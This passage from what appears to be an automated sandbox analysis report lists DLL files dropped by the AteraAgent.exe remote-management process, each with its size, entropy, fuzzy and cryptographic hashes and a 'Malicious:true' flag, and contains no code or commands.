                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:1vk7hWmCW0Nyb8E9VF6IYinAM+oCu4sn2n:1s7/gEpYinAMxCD
                                                                                                                                                                                                                                        MD5:A8698F78D7FDBE9C11E29DE1C8141F0D
                                                                                                                                                                                                                                        SHA1:DDE73E1F36AFCAB694188DF924255DF1DD5A54D3
                                                                                                                                                                                                                                        SHA-256:216C502237CD73674B98D143D63E7F60E963C184F49A429840E79AC78EBE6E8C
                                                                                                                                                                                                                                        SHA-512:0CDF41B1776CD8DBB2A94534B85EC0161996A3F12223497C6CF1E676B863EF66AEBD47B4E857A38F0759F4C6E228258E620FEEF7C2F2B0D7E4AA690D526DE622
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8752019860189915
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:VUiW2xf+C/WCUW52DNyby2sE9jBF6IYiYF8pA5K+oCGUHFLZio+HpyXR:7GMWCUW4Nyb8E9VF6IYinAM+oCR6Ji
                                                                                                                                                                                                                                        MD5:E7943D3776DF788CB4BB5983475C42C1
                                                                                                                                                                                                                                        SHA1:5BB28B2CAD8EFB83E9A3AD6944DF28B39E8FA578
                                                                                                                                                                                                                                        SHA-256:6BEF4F189347DFC49188886DAC2C1BDC67575A4782D9945BAE9D02736D9113BE
                                                                                                                                                                                                                                        SHA-512:8A1D4C7267E3D140344D1629D70C50EF4B873582C76027CC9C37FB560797D50A21133725C968036FC42F44269BDCC6C3C1EFE1D60FE1782997DB7689797E5F75
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.855920100243135
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:oBhwI7WSQWLNyb8E9VF6IYinAM+oCCtgNqqRq:oDwIBlEpYinAMxCij
                                                                                                                                                                                                                                        MD5:84690B08BFFE03B6BC40150D1437C32E
                                                                                                                                                                                                                                        SHA1:4755146A645F174ED652FABE74FDBAD329732EBF
                                                                                                                                                                                                                                        SHA-256:D3BD5400C629CBA40298704C856AC10F1FE88EB4A45FC0DA6E8CEF43D2E78ED5
                                                                                                                                                                                                                                        SHA-512:9017CCAC45B46FB34CC3BD4DE6D93B373764EADF512152E0D52849212A650AE98B3B16A29DCDE17F6AFD54CB1BC8D2CA0878E80A532FC678295278DC6CCE6BFE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.872271620769971
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:nyvPRW4lWaNyb8E9VF6IYinAM+oCnKGq8O:y39ZEpYinAMxCo8O
                                                                                                                                                                                                                                        MD5:58EF24053EF42A04319D32790B7D2869
                                                                                                                                                                                                                                        SHA1:4C4E8565A9A6245E1174448447259065155986DA
                                                                                                                                                                                                                                        SHA-256:A78C9C9EEC55D713E8C831F489180F2A4D7326F7DCDE0AA73B5D71D2DFC03DFE
                                                                                                                                                                                                                                        SHA-512:92BC0D5AA56C4023FEA0E07CC46FEED4084F95478D28F9D3B63C7A2CFF1ECE4D788ADF6E250E4875EB6139BBE263B0269F6A8BF8E3913E6138BF006DF0C11175
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.825074648710409
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:mnhp+J2sx/5W6eW5L2Nyby2sE9jBF6IYiYF8pA5K+oCGUHF9IAvcnV+:Q6RW6eWoNyb8E9VF6IYinAM+oCiAUnM
                                                                                                                                                                                                                                        MD5:42A89FD4C53986FBC8289708FFB1263B
                                                                                                                                                                                                                                        SHA1:AD7FE0D4FE9B5D687F6B0302274BF3D10C41E421
                                                                                                                                                                                                                                        SHA-256:7580CFED004628AED3387E69EC65F803554CC1FEABE713F5E40B0B8452B70CB1
                                                                                                                                                                                                                                        SHA-512:559AC7E5AFA90B9AE0E4E073E1AA4F3BD6E898DAD2D7D147FC1CE0AF5992811A1EDE8A3838D61A337A1400F9F19BA3EE1F24E3ED4671648AC743ABBDDFAAE872
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.854807580267664
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:2SPuxFp9W70W5pjNyby2sE9jBF6IYiYF8pA5K+oCGUHFqR3Oqfx:2SUP9W70WTNyb8E9VF6IYinAM+oCu1PZ
                                                                                                                                                                                                                                        MD5:7F36B38B6D68B2B84986A2BD204F4670
                                                                                                                                                                                                                                        SHA1:A3769DC8995D4A99C15A5EED0CE28D017B10EA8A
                                                                                                                                                                                                                                        SHA-256:304372309F5C1C12970DE3DB8BB676C9954502F59DA657B15DA1AB9BA6FA96BA
                                                                                                                                                                                                                                        SHA-512:40DE14AFC65204EAD6FE45A61C3EEE4026EF45FB665604DD84C938A86C26146F7F924EB50C9204DA5E26876AB3A47CE3F002A444D98F3F42D1A6E9F7884F1557
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.854259669078053
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:08yg07W0/WFNyb8E9VF6IYinAM+oC/ohW:0BH0EpYinAMxCAI
                                                                                                                                                                                                                                        MD5:23AF67BC85948EB59B156F6E1B169DC4
                                                                                                                                                                                                                                        SHA1:E47CE61981B756E526C46FD65F1296C32F332C9A
                                                                                                                                                                                                                                        SHA-256:480788BDF15639CDF55F20B15A20DFA0E9C02B9A4C0A48496108D1DEDBE79305
                                                                                                                                                                                                                                        SHA-512:240B05E6902D692A03934332327D50F22185026D1F74736B85731BE90297C5F27B802E846FC2E405AACECFDEEDFF61F8147B4E57E6BC07C32EBB8385FE8B286B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.817451458749103
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Ye1WmRWaNyb8E9VF6IYinAM+oCaMg1QHpt:YejdEpYinAMxC7qQHD
                                                                                                                                                                                                                                        MD5:B24EAD5E01B04D28A6DC648B73C5411F
                                                                                                                                                                                                                                        SHA1:2558069A63C79391D820B7AF5419B283B142C66D
                                                                                                                                                                                                                                        SHA-256:6978A0B2F1A3768723BB2048DDA4608D98DC2AAE542EAC0A84E4E8550E5591D2
                                                                                                                                                                                                                                        SHA-512:1D3D46FBD502AFFB87A87C90E1EAF899B3AD08CFD5BD67F2C31C75A27EC2EA5562D45B10F62BA20F5E05748451FCC41AA80FA5CF0A37845B5127E3D5BD2A6659
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):142384
                                                                                                                                                                                                                                        Entropy (8bit):6.160867202254787
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:6UGrszKKLBFa9DvrJGeesIf3afNs2AldfIQx:NBFd3/aFs2k
                                                                                                                                                                                                                                        MD5:1AF902AE58A5285D4C984667CA4DB012
                                                                                                                                                                                                                                        SHA1:3E76782E513AE584FCE02EDB4C6AB3BF745EC2BD
                                                                                                                                                                                                                                        SHA-256:2A93490DC647A7E6C4F25C39DB121B3BA7DA40220823CF5097B19748714F6786
                                                                                                                                                                                                                                        SHA-512:33EE31D1D8C3F64C53BCA3404944238C69B3D1451B9DAE91A55E3ACA6FFD840C93790DAEE328A558E68921B0FBE3CE97FDA72A88148A5DD1E70FA6211181B1C8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):192560
                                                                                                                                                                                                                                        Entropy (8bit):6.115118172678002
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BeruQlNGOhYq0AQcTvankc+8lbKta4FUPAT8xpRI454I/Kv6RpZ8dwPSgUq:EW60VcTvakcXcApO+
                                                                                                                                                                                                                                        MD5:F7F8A451FC433CE0BD62643595B07505
                                                                                                                                                                                                                                        SHA1:EC61EA54A820C4EC49C197C75D5D073F75E67594
                                                                                                                                                                                                                                        SHA-256:CCE9540674F12073E33383FAFCDE9833E422B2051C6541A01CE3926E7501502F
                                                                                                                                                                                                                                        SHA-512:648B1A6DFF07AA9FB25E8EB639AEAD1D8DD64B9318D32EDE13ECF4D7828FE5F75EC7A59FF088A334807FF2EA5681C25C56665C32D5033514984247637C8505CE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.840535349441126
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:hZsxgyrWYLW5lSNyby2sE9jBF6IYiYF8pA5K+oCGUHF5LxLC8MbPn:36ZWYLWyNyb8E9VF6IYinAM+oCNNLJwP
                                                                                                                                                                                                                                        MD5:8096FAF3898FE1D997791E2BA67526B5
                                                                                                                                                                                                                                        SHA1:66540D13EC95BAD099B1ED7C4E0970D442E4E559
                                                                                                                                                                                                                                        SHA-256:C694ABA5A2D2637B542DD24D7495932074DF88A9BED56B62AB4B452405B9C537
                                                                                                                                                                                                                                        SHA-512:D9AFBB5E6C88738296305CE95FEA38CFDB91FF5CBF148C6EC324AC883FC4CD8D3D5C8A6C02AC107EDF70BE8FA9BCB9BD337912F34549164D792F03F2976C4F60
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.791361913629093
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:Yk14xPxHWMQW5YGNyby2sE9jBF6IYiYF8pA5K+oCGUHFKHdLoxp:/1W1WMQWrNyb8E9VF6IYinAM+oCuH0p
                                                                                                                                                                                                                                        MD5:071286F1990E176FA76CF2D61F4AD4DD
                                                                                                                                                                                                                                        SHA1:CB830CFEC4163C383AD33C24DD569CF8BA59F1A7
                                                                                                                                                                                                                                        SHA-256:3B80E8D1641F6F3E65B0BD0FE75072B7A0E7CE8983BAFCC6EB0009341C1970AA
                                                                                                                                                                                                                                        SHA-512:355AC67C426D74675AF1D893F685D33ED74340570C81F9015FFA9C8B67D56865A16594CEF91BD5D7F79CD7A0DB48A87E9F2C6E3686C32E17EB4F6CE830AE2B85
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.831669015029541
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:pQ/rx72WSKW5xjNyby2sE9jBF6IYiYF8pA5K+oCGUHFA/kYkY:adSWSKWvNyb8E9VF6IYinAM+oCsDkY
                                                                                                                                                                                                                                        MD5:C89609756876CD7CDFFB186B82FA9FF9
                                                                                                                                                                                                                                        SHA1:10EA95CCCBD6EBA9918170B0C29EFD94B95B40A2
                                                                                                                                                                                                                                        SHA-256:A48E8269FCE970FF7841A436DE717557076E1F0FE870BBA2AFF8879FD629EC38
                                                                                                                                                                                                                                        SHA-512:00991A94AB06CAC0453A97C9D5A80A60BB5FA07229A9DE1DACC87BF6B12CFCFEC35827960ACCD7805497E6B6E1BD6818C1089CBAFC1CE642F62232C9C525EEF5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.747975378104776
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6JEYA2WkIWhNyb8E9VF6IYinAM+oC1IZd2ir:6yYA8vEpYinAMxC+ZNr
                                                                                                                                                                                                                                        MD5:526D05F47BB1A1D496DEBA1A65335DE3
                                                                                                                                                                                                                                        SHA1:ECA434B0141344B2E8D1C07D357B6AB7FC9B5BC2
                                                                                                                                                                                                                                        SHA-256:6C3CC500F7754AE90DDBEA82AE89929D44B9B34EF19BC6EA803D9529CEF7EBF2
                                                                                                                                                                                                                                        SHA-512:0EFF33AFD3314945F6DC3740762CE9DE9222439E4E3A0524CDBFD7EEB54A87DEAC423206C1472701DE48B26B4CEC025196DA65B7B1B185A29746B3BAE64346E1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.875300844233776
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:GJGWe4WENyb8E9VF6IYinAM+oC5OBcPrM:Km6EpYinAMxCbo
                                                                                                                                                                                                                                        MD5:590265DAAFB34F7E4F0A1F96A827EFB6
                                                                                                                                                                                                                                        SHA1:32D20CA35E7FE049A5533A8A42A7F743D74E5036
                                                                                                                                                                                                                                        SHA-256:DB34710E9A661149D59DA23EECB8A3C74C248FA9975B9EF1586424FB64E7799A
                                                                                                                                                                                                                                        SHA-512:C4FCB7E38E7782D938002EFCB6BC14A5F7FE7D0758C5ACF8D3E8ED613983D59769F5D3A376339B53EECD80E4AEBB6682A55710B2A74D7EA071E7459705C58AAD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.787070160276154
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:adW1w3WesWvNyb8E9VF6IYinAM+oCV4j2:P1wx1EpYinAMxC+C
                                                                                                                                                                                                                                        MD5:A6FA646C6BD8B6402C07B5F4C6B8CA58
                                                                                                                                                                                                                                        SHA1:81A2661413892E25D00E6808CEB422DCD41D6C97
                                                                                                                                                                                                                                        SHA-256:B8FEB34B4C1CDA4D47E5DA294E288C4A76C92818AE376B210C1929A79B8760E4
                                                                                                                                                                                                                                        SHA-512:289CDD78EFA41C00AA496F7468320FDA94D05B865DFBFAFD14048D79CE948F86E90D82514E33E6CD37D6A2E5B9569331CE4CCFC2C09ED13EE0F0E6D83D2B9CCE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24624
                                                                                                                                                                                                                                        Entropy (8bit):6.597715284507874
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:nylNGlfdqj5531HJTABhf8g2MkO1ICMbmiT2Y4Y3ocWS9sWvW8YsWmNyb8E9VF6s:nyp12Bhkg3qnV/sEEpYinAMxCRQ
                                                                                                                                                                                                                                        MD5:50FE1EA3CE088CC760CF5B1623E0A77C
                                                                                                                                                                                                                                        SHA1:5E257421620787A5858322A475A452F76BA065AE
                                                                                                                                                                                                                                        SHA-256:421F5F5264B99701B6FD3FF4BE82F1F4FE4A9446A756216C75ED360E69AE256A
                                                                                                                                                                                                                                        SHA-512:F748A84516B3796FB1735E6EEEE0D9DFD46BD85E4A8F2402A777C27F37D5D982FE94A95FBC5CE763AC310BA0E972354C664F440E24B2B515446908C4B5D36755
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.85685793500782
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:3LHPAW1bWPNyb8E9VF6IYinAM+oCJ5VjDx:3TrCEpYinAMxC3
                                                                                                                                                                                                                                        MD5:8D9807170A4A571C1C5831FAB0F9E041
                                                                                                                                                                                                                                        SHA1:4D11A6E2F0FD1EB480C1AAB9A29D5FBD0D2F092A
                                                                                                                                                                                                                                        SHA-256:57E869D189C0568E8A8CBF8BCF174708171B39E2F06EB254D89B75D6D163E1F4
                                                                                                                                                                                                                                        SHA-512:FED3B0D99C3FDDB66788606674B5E4279E3C08C1860B56208B47136EE4874BFFB915CC1A738A0F457CA6604C39527CA3FC32B7923274A867520B2D5E28EBDD19
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.85606999487658
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:cNoqWD7WXNyb8E9VF6IYinAM+oCeBbtUm:cNofCEpYinAMxCCd
                                                                                                                                                                                                                                        MD5:8F3A6225F7A7E2F11723B3B874D0F20C
                                                                                                                                                                                                                                        SHA1:9D0BF1F31FD593925A933F883C6060DB8B8DD357
                                                                                                                                                                                                                                        SHA-256:D505D62794BE9A172C19A17AFE9423BD17D7FB2DCB3E1A20102E4043B830CAC5
                                                                                                                                                                                                                                        SHA-512:7AB5ABE34FD3F4FC9BE6C946510D2D2CB9C938B3E64A6C8F73502C124B09E80AC584A3BF8DD5593F21EA44C7659B51AD669897FBCC3F88F42DF80BE9F652013E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.865532201187094
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:BGETSAWUEWvNyb8E9VF6IYinAM+oC6tiRByq:1T1tEpYinAMxCP/
                                                                                                                                                                                                                                        MD5:738BBFB7A8592192CBCEFF5584FF5618
                                                                                                                                                                                                                                        SHA1:6892364BD3957AB4ED2507DC5A70FA85E6485A81
                                                                                                                                                                                                                                        SHA-256:7C24F1EADA09F16B7827E6766F9CD905AD7BE5AC8B20A409E037F327DF3AE02F
                                                                                                                                                                                                                                        SHA-512:37B19642FCBA7C67CB137D8A95630ECB9F906B2D76EF3BAD6B286FFD02D8C939C01C8B3F9515ACB3AAC51BFFEFE53339D60007DB2E81ECA7E09A9B44DCFB9DF3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):110128
                                                                                                                                                                                                                                        Entropy (8bit):5.51231720661361
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:gPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/i7HxJ:gWw0SUUKBM8aOUiiGw7qa9tK/i3
                                                                                                                                                                                                                                        MD5:B58BFC2378EE763E84EB0D6F33623F49
                                                                                                                                                                                                                                        SHA1:C6602B83CD281FE3EEA1247D47EE4FCAAB0DBF06
                                                                                                                                                                                                                                        SHA-256:6BD75EAC42974E87C19450B0E2EBB2CA462FE0FDFFA367F75548DDE19EB2AFD7
                                                                                                                                                                                                                                        SHA-512:33559A87818C2309B1FD8E279A3D9BB5E3BAAD9D19B1FBA1C942BAB75C41D324AD3C21181323C371327EC350929C578F34638B60013D3C265E1A0B287572AB17
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.847980384791941
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:9cDagtDApWSKJWVNyb8E9VF6IYinAM+oC4LsTaZ:9PKBCEpYinAMxCN0
                                                                                                                                                                                                                                        MD5:512AC7623AABFF8A9D4860878E944A5F
                                                                                                                                                                                                                                        SHA1:969E6FF8030C7A194E758734815FFF3BD744B90F
                                                                                                                                                                                                                                        SHA-256:15C9AA816AB590B201C6A70F9C63D09D0FB93AF486CDBE34A22FD0887BDBBF61
                                                                                                                                                                                                                                        SHA-512:798C40542F48E2E6ECB6081195C0F29DAD4819B175DBF77A88AAF11FAE24CE5F9B7814CF4BC9726F8516ECEF80E7068C8347C58DF501F53F23D74916524CF3CF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8584780983893845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:36NxhqWD4W52ANyby2sE9jBF6IYiYF8pA5K+oCGUHFAybofr39Sg:WIWD4W3Nyb8E9VF6IYinAM+oCM0utSg
                                                                                                                                                                                                                                        MD5:8268E10BCD931ADB25F1265C995B2B21
                                                                                                                                                                                                                                        SHA1:64F747428A330BE19B1C247B983A00068F1A84A8
                                                                                                                                                                                                                                        SHA-256:FC4AF82A198EFA9D428207EE8826AB1E12761DCEE197AF96D6D3DB114D678EF1
                                                                                                                                                                                                                                        SHA-512:A87831A26504361BCC99B560BB8ED92D10EF59A00D7340008261D347F24A2D9A51406F4F79C5B621CB3CED0642A6492A45C86D8716CCE0F3F8B3B5CCE8DC6D19
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.784561632206215
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:nMWzQWONyb8E9VF6IYinAM+oCN/JuuNo2:n54EpYinAMxCpjr
                                                                                                                                                                                                                                        MD5:F09E04510F68204A1B0418275FA4D7B5
                                                                                                                                                                                                                                        SHA1:B6199887CC182AE07F32B8A92019C6C2F8A831C6
                                                                                                                                                                                                                                        SHA-256:876ADF0593EDB181E39460FDB241A8CF3811D7D6212D756F54777D4AA942430F
                                                                                                                                                                                                                                        SHA-512:ED15F2376F9E660160269AC49F20EE5D973A86FA89933DEF4CCD9119EC0F672D280440BF813D9D2E137567DF5D9237831B33165E82DF3A214D912E57C72C239F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.724764212651807
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:GxDHKWAMWeNyb8E9VF6IYinAM+oClPKZ0q:CD8wEpYinAMxCV5q
                                                                                                                                                                                                                                        MD5:9ED9C29955557937255E94A482605EA4
                                                                                                                                                                                                                                        SHA1:4EC708B0302AF71315D8989826F14133A937661B
